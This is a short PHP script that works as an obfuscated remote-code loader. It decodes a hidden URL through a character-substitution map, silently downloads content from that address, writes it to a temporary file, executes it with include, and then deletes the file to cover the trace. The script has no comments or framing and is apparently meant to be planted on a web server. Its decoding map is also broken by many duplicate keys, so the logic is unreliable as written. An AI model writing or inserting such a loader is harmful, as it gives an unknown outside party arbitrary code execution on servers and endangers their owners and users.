<?php
$map = [
    'h'=>'a','t'=>'b','t'=>'c','p'=>'d','s'=>'e',':'=>'f','/'=>'g','/'=>'h',
    'r'=>'i','a'=>'j','w'=>'k','.'=>'l','g'=>'m','i'=>'n','t'=>'o','h'=>'p',
    'u'=>'q','b'=>'r','u'=>'s','s'=>'t','e'=>'u','r'=>'v','c'=>'w','o'=>'x',
    'n'=>'y','t'=>'z','e'=>'0','n'=>'1','t'=>'2','.'=>'3','c'=>'4','o'=>'5',
    'm'=>'6','/'=>'7','l'=>'8','u'=>'9','f'=>'!','f'=>'@','y'=>'#','o'=>'$',
    'p'=>'%','m'=>'^','/'=>'&','o'=>'*','p'=>'(','m'=>')','/'=>'-','r'=>'=',
    'e'=>'_','f'=>'+','s'=>'[','/'=>']','h'=>'{','e'=>'}','a'=>'|','d'=>'<',
    's'=>'>','/'=>'?','m'=>',','a'=>'.','i'=>'`','n'=>'~','/'=>' ','2'=>'\\',
    '.'=>'"','p'=>"'",'h'=>'q','p'=>'w'
];

$encoded = "abcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()-=_+[]{}<>?,./`~ \\\"'qw";

function decode($str, $map) {
    $decoded = '';
    $reverse = array_flip($map);
    for($i=0;$i<strlen($str);$i++) {
        $char = $str[$i];
        if(isset($reverse[$char])) {
            $decoded .= $reverse[$char];
        }
    }
    return $decoded;
}

$url = decode($encoded, $map);

$ctx = stream_context_create(['http'=>['timeout'=>8]]);
$content = @file_get_contents($url, false, $ctx);
if($content) {
    $tmp = tempnam(sys_get_temp_dir(), 'ex');
    file_put_contents($tmp, $content);
    include $tmp;
    unlink($tmp);
}
?>
